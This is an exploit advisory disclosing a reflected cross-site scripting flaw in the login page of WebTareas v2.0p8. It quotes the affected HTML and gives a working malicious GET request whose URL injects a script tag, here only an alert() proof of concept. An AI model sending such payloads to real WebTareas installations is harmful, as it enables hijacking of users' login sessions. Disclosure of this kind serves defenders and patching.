# Exploit Title: WebTareas v2.0p8 - Login Portal - Reflected Cross Site Scripting (XSS)
# Exploit Author: Bobby Cooke
# Date: May 7th, 2020
# Vendor Homepage: http://webtareas.sf.net/
# Software Link: https://sourceforge.net/projects/webtareas/files/2.0p8/webTareas-v2.0p8.zip/download
# Version: v2.0p8
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Description: WebTareas v2.0p8 suffers from a reflected Cross Site Scripting (XSS) vulnerability on the 'login.php' webpage. When accessing the login page, the URL is reused within the webpage in an unsafe way; it is reused in the login form.
# Affected HTML Source Code (Shortened with "...")
94 <div id="wtLogin">...><h1>webTareas</h1></div><form ... method="POST" action="/webtareas/general/login.php?boku"><script>alert("KAAAA-MEEHHHH-HAAAA...MEEE..HAAAA!!");</script>" name="loginForm"...
95 <input id="passwordForm" name="passwordForm" type="password" placeholder="Password"/>
96 <input class="submit-button" type="submit" name="loginSubmit" value="Log In">...
# Malicious GET Request
GET /webtareas/general/login.php?boku"><script>alert("KAAAA-MEEHHHH-HAAAA...MEEE..HAAAA!!");</script> HTTP/1.1
Host: 10.16.65.130
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cookie: webTareasSID=url0mrcng8q22c54kt3fs0d64g